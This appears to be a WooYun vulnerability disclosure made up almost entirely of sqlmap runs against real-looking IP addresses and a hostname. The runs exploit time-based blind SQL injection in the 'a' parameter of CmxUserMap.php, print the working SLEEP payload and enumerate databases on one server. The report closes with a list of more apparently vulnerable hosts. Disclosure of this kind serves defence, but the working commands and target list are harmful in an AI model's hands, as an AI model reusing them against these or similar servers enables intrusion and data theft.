WooYun.org

python sqlmap.py -u "http://218.91.204.132:8080/Server/CmxUserMap.php?t=&a=123&b=32&c=undefined&d=" --dbms="mysql"
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[21:11:07] [INFO] testing 'MySQL UNION query (71) - 1 to 20 columns'
[21:11:16] [INFO] checking if the injection point on GET parameter 'a' is a false positive
GET parameter 'a' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 339 HTTP(s) requests:
---
Parameter: a (GET)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: t=&a=123' AND (SELECT * FROM (SELECT(SLEEP(5)))JarV) AND 'aSBL'='aSBL&b=32&c=undefined&d=
---
[21:11:39] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.11
[21:11:39] [INFO] fetched data logged to text files under 'C:\Users\xfkxfk\.sqlmap\output\218.91.204.132'
[*] shutting down at 21:11:39

python sqlmap.py -u "http://61.182.242.18:8080/Server/CmxUserMap.php?t=&a=123&b=32&c=undefined&d=" --dbms="mysql"
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: a (GET)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: t=&a=123' AND (SELECT * FROM (SELECT(SLEEP(5)))zwjn) AND 'NlSP'='NlSP&b=32&c=undefined&d=
---
[21:21:11] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[21:21:27] [INFO] confirming MySQL
[21:21:27] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[21:21:38] [INFO] adjusting time delay to 1 second due to good response times
[21:21:38] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
[21:21:38] [INFO] fetched data logged to text files under 'C:\Users\xfkxfk\.sqlmap\output\61.182.242.18'
[*] shutting down at 21:21:38

python sqlmap.py -u "http://tianyicnc.meibu.com:800/Server/CmxUserMap.php?t=&a=123&b=32&c=undefined&d=" --dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: a (GET)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: t=&a=123' AND (SELECT * FROM (SELECT(SLEEP(5)))orFh) AND 'RZuz'='RZuz&b=32&c=undefined&d=
---
[21:22:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.11
[21:22:52] [INFO] fetching database names
[21:22:52] [INFO] fetching number of databases
[21:22:52] [INFO] resumed: 3
[21:22:52] [INFO] resumed: information_schema
[21:22:52] [INFO] resumed: mysql
[21:22:52] [INFO] resumed: rasdatabase
available databases [3]:
[*] information_schema
[*] mysql
[*] rasdatabase
[21:22:52] [INFO] fetched data logged to text files under 'C:\Users\xfkxfk\.sqlmap\output\tianyicnc.meibu.com'
[*] shutting down at 21:22:52

http://218.91.204.132:8080/
http://202.103.252.103/
http://202.104.138.33/
http://221.226.23.10:81/
http://222.184.237.178:81/
http://114.80.129.171:8080
http://124.160.67.214
http://58.251.164.97/
http://115.238.32.206:8888/
http://202.104.138.40/
http://221.226.184.125:81/
......